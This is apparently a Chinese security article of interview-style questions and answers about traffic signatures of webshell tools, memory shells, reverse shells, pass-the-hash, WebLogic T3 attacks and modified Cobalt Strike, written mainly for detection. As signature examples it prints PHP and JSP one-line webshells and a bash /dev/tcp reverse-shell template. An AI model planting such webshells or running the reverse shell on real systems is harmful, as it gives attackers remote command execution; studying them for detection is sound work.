文章总结： 该文档系统总结了HVV渗透测试中常见攻击工具和技术的流量特征，涵盖中国菜刀、蚁剑/冰蝎、各类内存马、反弹Shell等核心知识点，并提供了具体检测指标和识别方法。内容聚焦实战场景，对蓝队防守和红队攻击均有参考价值，强调通过协议特征、行为模式、关键函数等维度进行有效识别与防御。 综合评分： 85 文章分类： 渗透测试,红队,内网渗透,WEB安全,应急响应

渗透面试分享(含答案)-HVV特别版

原创

ladon ladon

306Safe

2026年5月13日 10:39 北京

在小说阅读器读本章

去阅读

“ 安全从业者的知识宝库”

特别版

—

“蓝队重点检查 – 红队重点关注”

1. 中国菜刀流量及特征？

● 中国菜刀通常使用POST方法传输数据，流量非常简洁，请求头不含多余字段。

● 特征关键字包括 @eval($_POST[‘pass’]); 和 @assert($_POST[‘pass’]);。

● 默认UA多为通用浏览器标识，没有专属特征。

● 流量特点：单次请求包体小，仅传输密钥和指令，不含冗余配置；通常明文传输，容易被特征匹配识别，少数改版会加简单异或加密。

● 兼容ASP/PHP/JSP一句话木马，语言适配性强，shell稳定性高于蚁剑。

2. 蚁剑和冰蝎核心流量特征区别？

● 蚁剑：请求为单次独立包，无密钥协商流程；支持自定义加密，流量无固定包头；请求头可随意定制；通信无长连接；UA随机无规律。

● 冰蝎：1/2/3版本有前置GET请求协商密钥（核心区分点）；2.0版Accept字段固定且带随机三位数；默认HTTP1.1长连接（Keep-Alive明显）；低版本内置固定UA池循环使用，版本特征显著。

3. 常规JSP一句话木马特征？

● 核心特征：Runtime.getRuntime().exec、java.io.InputStream、<%Runtime%>

● 经典代码格式：<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

● 流量中常含 cmd、command、exec 等敏感参数。

● 常出现Base64编码的Java执行代码（含 sun.misc.BASE64Decoder 标签）。

● 多植入JSP页面尾部，无业务逻辑，仅保留命令执行语句；变形版可能伪装成注释或换行，但保留 exec 核心函数。

4. Tomcat Filter型内存马特征？

● 不生成磁盘文件，仅驻留JVM内存。

● 通过恶意自定义Filter注册至Tomcat全局过滤器链，拦截所有HTTP请求。

● 内存有异常ClassLoader加载记录，存在 TemplatesImpl 恶意加载链。

● 访问日志正常，但后台有陌生Filter注册痕迹。

● 排查需导出内存Filter类，反编译可见命令执行或后门代理逻辑。

5. Tomcat Listener型内存马特征？

● 通过Tomcat事件监听器（如 ServletRequestListener/ServletContextListener）注入。

● 不新增Filter或Servlet，隐蔽性更强，常规扫描无法发现。

● 监听请求生命周期事件自动触发恶意代码，无需主动连接。

● 内存存在异常Listener注册条目，关联 Bcel 或 TemplatesImpl 类加载特征。

● 无主动连接流量，被动触发执行，溯源难度高。

6. 攻防演练中反弹Shell流量特征？

● Linux反弹：含 bash -i >& /dev/tcp/IP/端口 0>&1，TCP长连接持续通信。

● Windows反弹：含 powershell IEX、Invoke-Expression、nc.exe 等关键字。

● 常用高危端口（4444、5555等）或伪装80、443端口。

● 建立TCP长连接后双向交互，无固定心跳周期（区别于C2）。

● 加密反弹虽无明文命令，但保持长连接交互模式。

7. 哈希传递（PtH）横向攻击流量特征？

● 通过SMB协议（端口445）传播，内网高频利用。

● NTLM认证异常：大量NTLMv1/v2认证包，但无真实账号登录记录。

● 仅传递NTLM哈希值，无明文密码。

● 单主机短期内批量探测内网机器445端口并认证。

● 常伴随IPC$空连接、计划任务、服务启动等后续流量。

8. WebLogic T3协议漏洞攻击特征？

● 使用T3协议（主端口7001），流量头部含固定T3协议标识。

● 非HTTP流量，无Host、UA等Web字段（强识别特征）。

● 包体较大，含序列化恶意对象（有 java.io.Serializable 特征）。

● 利用时发送多段T3握手包，后跟恶意payload。

● 直接IP+端口通信，绕过Web规则检测，依赖协议特征识别。

9. Web一句话木马常见绕过手法及识别特征？

● 绕过手法：大小写混淆、字符串拼接、注释隔断、Base64/十六进制编码、自定义加密。

● 核心：无论变形，eval/assert/exec 函数必存在，可特征匹配。

● 伪装：嵌入业务代码或伪装成JS/CSS注释，保留参数接收+命令执行逻辑。

● 流量层面：即使代码变形，传参密钥和指令请求的规律不变。

● 加密shell虽无明文，但存在固定加解密包头和请求长度特征。

10. 魔改/二开CobaltStrike甄别特征？

● 魔改可换UA、端口、心跳周期、去掉checksum8，基础特征失效。

● 核心指纹：JA3/JA3S（SSL握手）无法篡改，仍匹配原版CS版本。

● 行为特征：保持固定心跳间隔、分段数据回传、POST指令模式。

● DNS隧道二开仍具子域名随机拼接、多级域名传输特征。

● 样本分析：恶意载荷反编译可见CS经典Beacon架构和配置结构。

END

—

  关注公众号，持续分享各种面经及安全知识～

感谢，祝大家在渗透之路，大杀四方！！！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：306Safe ladon ladon《渗透面试分享(含答案)-HVV特别版》